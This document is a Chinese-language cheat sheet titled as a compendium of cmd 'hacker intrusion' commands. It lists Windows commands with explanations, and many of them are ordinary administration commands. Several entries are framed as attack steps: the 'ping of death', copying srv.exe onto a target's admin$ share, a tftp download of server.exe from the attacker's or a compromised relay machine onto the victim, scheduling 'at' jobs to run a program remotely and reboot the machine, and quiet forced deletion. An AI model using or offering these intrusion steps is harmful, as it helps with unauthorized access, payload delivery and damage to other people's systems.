cmd黑客入侵命令大全

nbtstat -A ip 對方136到139其中一個端口開了的話，就可查看對方最近登錄的用戶名（03前的爲用戶名）-注意：參數-A要大寫 

tracert -參數 ip(或計算機名) 跟蹤路由（數據包），參數：「-w數字」用於設置超時間隔。 

ping ip(或域名) 向對方主機發送默認大小爲32字節的數據，參數：「-l[空格]數據包大小」；「-n發送數據次數」；「-t」指一直ping。 

ping -t -l 65550 ip 死亡之ping(發送大於64K的文件並一直ping就成了死亡之ping) 

ipconfig (winipcfg) 用於windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用參數「/all」顯示所有配置信息 

tlist -t 以樹行列表顯示進程(爲系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內) 

kill -F 進程名 加-F參數後強制結束某進程(爲系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內) 

del -F 文件名 加-F參數後就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件，/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔之外的文件。例如「DEL/AR *.*」表示刪除當前目錄下全部只讀文件，「DEL/A-S *.*」表示刪除當前目錄下除系統文件之外的全部文件

del /S /Q 目錄 或用：rmdir /s /Q 目錄 /S刪除目錄及目錄下的全部子目錄和文件。同時使用參數/Q 可取消刪除操做時的系統確認就直接刪除。（二個命令做用相同） 

move 盤符路徑要移動的文件名　存放移動文件的路徑移動後文件名 移動文件,用參數/y將取消確認移動目錄存在相同文件的提示就直接覆蓋 

fc one.txt two.txt > 3st.txt 對比二個文件並把不一樣之處輸出到3st.txt文件中，"> "和"> >" 是重定向命令 

at id號 開啓已註冊的某個計劃任務 

at /delete 中止全部計劃任務，用參數/yes則不須要確認就直接中止 

at id號 /delete 中止某個已註冊的計劃任務 

at 查看全部的計劃任務 

at ip time 程序名(或一個命令) /r 在某時間運行對方某程序並從新啓動計算機 

 

telnet ip 端口 遠和登錄服務器,默認端口爲23 

open ip 鏈接到IP（屬telnet登錄後的命令） 

telnet 在本機上直接鍵入telnet 將進入本機的telnet 

copy 路徑文件名1　路徑文件名2 /y 複製文件1到指定的目錄爲文件2，用參數/y就同時取消確認你要改寫一份現存目錄文件 

copy c:srv.exe ipadmin$ 複製本地c:srv.exe到對方的admin下 

cppy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件頭要空三排，參數：/b指二進制文件，/a指ASCLL格式文件 

copy ipadmin$svv.exe c: 或:copyipadmin$*.* 複製對方admini$共享下的srv.exe文件（全部文件）至本地C： 

xcopy 要複製的文件或目錄樹　目標地址目錄名 複製文件和目錄樹，用參數/Y將不提示覆蓋相同文件 

tftp -i 本身IP(用肉機做跳板時這用肉機IP) get server.exe c:server.exe 登錄後，將「IP」的server.exe下載到目標主機c:server.exe 參數：-i指以二進制模式傳送，如傳送exe文件時用，如不加-i 則以ASCII模式（傳送文本文件模式）進行傳送 

tftp -i 對方IP　put c:server.exe 登錄後，上傳本地c:server.exe至主機 

ftp ip 端口 用於上傳文件至服務器或進行文件操做，默認端口爲21。bin指用二進制方式傳送（可執行文件進）；默認爲ASCII格式傳送(文本文件時) 

route print 顯示出IP路由，將主要顯示網絡地址Network addres，子網掩碼Netmask，網關地址Gateway addres，接口地址Interface 

arp 查看和處理ARP緩存，ARP是名字解析的意思，負責把一個IP解析成一個物理性的MAC地址。arp -a將顯示出所有信息 

start 程序名或命令 /max 或/min 新開一個新窗口並最大化（最小化）運行某程序或命令 

mem 查看cpu使用狀況 

attrib 文件名(目錄名) 查看某文件（目錄）的屬性 

attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存檔，只讀，系統，隱藏 屬性；用＋則是添加爲某屬性 

dir 查看文件，參數：/Q顯示文件及目錄屬系統哪一個用戶，/T:C顯示文件建立時間，/T:A顯示文件上次被訪問時間，/T:W上次被修改時間 

date /t 、 time /t 使用此參數即「DATE/T」、「TIME/T」將只顯示當前日期和時間，而沒必要輸入新日期和時間 

set 指定環境變量名稱=要指派給變量的字符 設置環境變量 

set 顯示當前全部的環境變量 

set p(或其它字符) 顯示出當前以字符p(或其它字符)開頭的全部環境變量 

pause 暫停批處理程序，並顯示出：請按任意鍵繼續.... 

if 在批處理程序中執行條件處理（更多說明見if命令及變量） 

goto 標籤 將cmd.exe導向到批處理程序中帶標籤的行（標籤必須單獨一行，且以冒號打頭，例如：「：start」標籤） 

call 路徑批處理文件名 從批處理程序中調用另外一個批處理程序 （更多說明見call /?） 

for 對一組文件中的每個文件執行某個特定命令（更多說明見for命令及變量） 

echo on或off 打開或關閉echo，僅用echo不加參數則顯示當前echo設置 

echo 信息 在屏幕上顯示出信息 

echo 信息 >> pass.txt 將"信息"保存到pass.txt文件中 

findstr "Hello" aa.txt 在aa.txt文件中尋找字符串hello 

find 文件名 查找某文件.